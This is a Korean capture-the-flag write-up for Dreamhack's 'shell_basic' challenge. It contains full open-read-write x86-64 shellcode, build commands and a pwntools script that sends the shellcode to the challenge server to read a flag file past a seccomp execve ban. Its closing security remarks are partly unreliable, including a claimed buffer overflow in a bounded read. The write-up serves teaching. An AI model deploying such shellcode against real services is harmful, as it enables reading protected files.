[Dreamhack] Level2: shell_basic

🛎️Access

입력한 셸코드를 실행하는 프로그램이 서비스로 등록되어 작동하고 있습니다.
main 함수가 아닌 다른 함수들은 execve, execveat 시스템 콜을 사용하지 못하며, 풀이와 관련이 없습니다.
flag 파일의 위치와 이름은 /home/shell_basic/flag_name_is_loooooong입니다.

 

 

👾 Exploit Algorithm & Payload

// Compile: gcc -o shell_basic shell_basic.c -lseccomp
// apt install seccomp libseccomp-dev

#include <fcntl.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <signal.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void init() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(10);
}

void banned_execve() {
  scmp_filter_ctx ctx;
  ctx = seccomp_init(SCMP_ACT_ALLOW);
  if (ctx == NULL) {
    exit(0);
  }
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execveat), 0);

  seccomp_load(ctx);
}

void main(int argc, char *argv[]) {
  char *shellcode = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);   
  void (*sc)();
  
  init();
  
  banned_execve();

  printf("shellcode: ");
  read(0, shellcode, 0x1000);

  sc = (void *)shellcode;
  sc();
}

 

 

#1

---

#include<stdio.h>
#include<stdlib.h>
#include<fcntl.h>
#include<unistd.h>

int main(void){
	int fd;
    char buf[0x30];
    
    fd = open("/home/shell_basic/flag_name_is_loooooong", RD_ONLY, 0);
    read(fd, buf, 0x30);
    write(1, buf, 0x30);
}

: execve 시스템 콜을 사용하지 못한다는 문제를 보고 orw 쉘 코드를 작성해서 '/home/shell_basic/flag_name_is_loooooong' 경로에 있는 flag 파일을 열람하는 문제임을 짐작했다.

: orw(Open-Read-Write) 쉘 코드를 작성하기 전에 c언어로 동작은 다음과 같다.

 

 

#2

---

: 동작 확인 후 스켈레톤 코드로 orw 코드의 뼈대를 작성하였다.

__asm__(
".global run_sh\n"
"run_sh:\n"

"xor rax, rax\n"
"push rax #NULL(=0)\n"
"mov rax, 0x676e6f6f6f6f6f6f #'oooooong'\n"
"push rax\n"
"mov rax, 0x6c5f73695f656d61  #'ame_is_l'\n"
"push rax\n"
"mov rax, 0x6e5f67616c662f63 #'c/flag_n'\n"
"push rax\n"
"mov rax, 0x697361625f6c6c65 #'ell_basi'\n"
"push rax\n"
"mov rax, 0x68732f656d6f682f #'/home/sh'\n"
"push rax\n"
"mov rdi, rsp #rdi=rsp; rdi='/home/shell_basic/flag_name_is_loooooong'\n"
"xor rsi, rsi #rsi=0\n"
"xor rdx, rdx #rdx=0\n"
"mov rax, 0x02 #rax=2; rax=sys_open\n"
"syscall #open('/home/shell_basic/flag_name_is_loooooong', RD_ONLY, NULL)\n"
"\n"

"mov rdi, rax       #rdi = fd\n"
"mov rsi, rsp\n"
"sub rsi, 0x30      #rsi = rsp-0x30; rsi=buf\n"
"mov rdx, 0x30      #rdx = 0x30; rdx=len\n"
"mov rax, 0x0       #rax = 0; rax=syscall_read\n"
"syscall            #read(fd, buf, 0x30)\n"
"\n"

"mov rdi, 1         #rdi = 1; fd = stdout\n"
"mov rax, 0x1       #rax = 1; rax=syscall_write\n"
"syscall            #write(fd, buf, 0x30)\n"
"\n"

"xor rdi, rdi       #rdi = 0\n"
"mov rax, 0x3c     #rax = sys_exit\n"
"syscall     #syscall(rax,rdi)exit(0)"
);

 

void run_sh();

int main() { run_sh(); }

 

; File name: exploit.asm

section .text
global _start

_start:
;open
xor rax, rax
push rax ;NULL(=0)
mov rax, 0x676e6f6f6f6f6f6f ;oooooong
push rax
mov rax, 0x6c5f73695f656d61 ;ame_is_l
push rax
mov rax, 0x6e5f67616c662f63 ;c/flag_n
push rax
mov rax, 0x697361625f6c6c65 ;ell_basi
push rax
mov rax, 0x68732f656d6f682f ;/home/sh
push rax
mov rdi, rsp ;rdi=rsp ;rdi=/home/shell_basic/flag_name_is_loooooong
xor rsi, rsi ;rsi=0
xor rdx, rdx ;rdx=0
mov rax, 0x02 ;rax=2 ;rax=sys_open
syscall ;open('/home/shell_basic/flag_name_is_loooooong', RD_ONLY, NULL)

;read
mov rdi, rax ;rdi = fd
mov rsi, rsp
sub rsi, 0x30 ;rsi = rsp-0x30 ;rsi=buf
mov rdx, 0x30 ;rdx = 0x30 ;rdx=len
mov rax, 0x00 ;rax = 0 ;rax=syscall_read
syscall ;read(fd, buf, 0x30)

;write
mov rdi, 0x01 ;rdi = 1 ;fd = stdout
mov rax, 0x01 ;rax = 1 ;rax=syscall_write
syscall ;write(fd, buf, 0x30)

;exit 
xor rdi, rdi ;rdi = 0
mov rax, 0x3c ;rax = sys_exit
syscall ;exit(rax,rdi)

 

: orw 코드는 다음과 같이 작성했다.

: '/home/shell_basic/flag_name_is_loooooong'의 문자열을 ASCII -> 16진수 변환(리틀 엔디언 방식)으로 변환하여 stack에 넣어주었다.

※stack push 내부 순서 → /home/sh → ell_basi → c/flag_n → ame_is_l → oooooong → \x00 )

※stack pop 내부순서 ← /home/sh ← ell_basi ← c/flag_n ← ame_is_l ← oooooong ← \x00 )

: open 함수를 syscall을 통해 호출한다.
: read 함수를 0x30만큼 읽어 지역변수 buf에 저장한다.
: write 함수를 syscall을 통해 write 함수 사용한다.
: 마지막으로 프로그램을 종료시킬 exit 함수 사용한다.

 

 

#3

---

$ nasm -f elf64 exploit.asm
$ objdump -d exploit.o
$ objcopy --dump-section .text=exploit.bin exploit.o

: asm 파일을 .o파일(컴파일)화 시키기 위해 nasm 명령어를 사용했다.

: objcopy 명령을 사용하여 objdump를 byte code(opcode)의 형태로 추출했다.

: 추출 후 서버로 셸 코드를 획득할 수 있다.

 

🔑Analysis and results for obtaining the Flag DH{…}

---

from pwn import *
  
r = remote("host3.dreamhack.games", 17047)
 
shellcode = b"\x48\x31\xc0\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05"  

 

r.sendafter(b": ", shellcode)
r.interactive()

+ 추가로 python 모듈 pwntools로도 FLAG를 획득할 수 있다.

 

 

📌Summary

---

공격자가 쉘 코드를 이용하면 해당되는 코드는 정상적인 동작을 하지 않을 수 있음

해당 코드의 rip이 공격자가 작성된 셀 코드로 이동되어 의도된 엄셈블리 코드가 실행될 수 있음

또한 어셈블리어는 기계어와 거의 일대일 대응되므로 원하는 모든 명령을 CPU에 내릴 수 있게 됨

 

mmap 사용: 코드에서 mmap을 사용하여 쉘코드를 할당하고 해당 메모리를 실행 가능한 메모리로 설정
쉘코드가 실행되도록 하는 방법이며, 악용될 경우 보안에 취약할 수 있음

seccomp 설정: banned_execve() 함수에서 libseccomp을 사용하여 execve 및 execveat 시스템 콜을 차단
그러나 이것만으로는 모든 공격을 완벽하게 막을 수 없음

버퍼 오버플로우 가능성: read(0, shellcode, 0x1000);에서 사용자 입력이 메모리 할당 크기를 초과할 경우 버퍼 오버플로우가 발생할 수 있음

...

 

따라서 정적 분석 및 코드 검토를 철저히 수행하고, 배포 전에 취약점을 식별할 수 있도록 해야하며 각별히 여러 부분에서 주의해야 함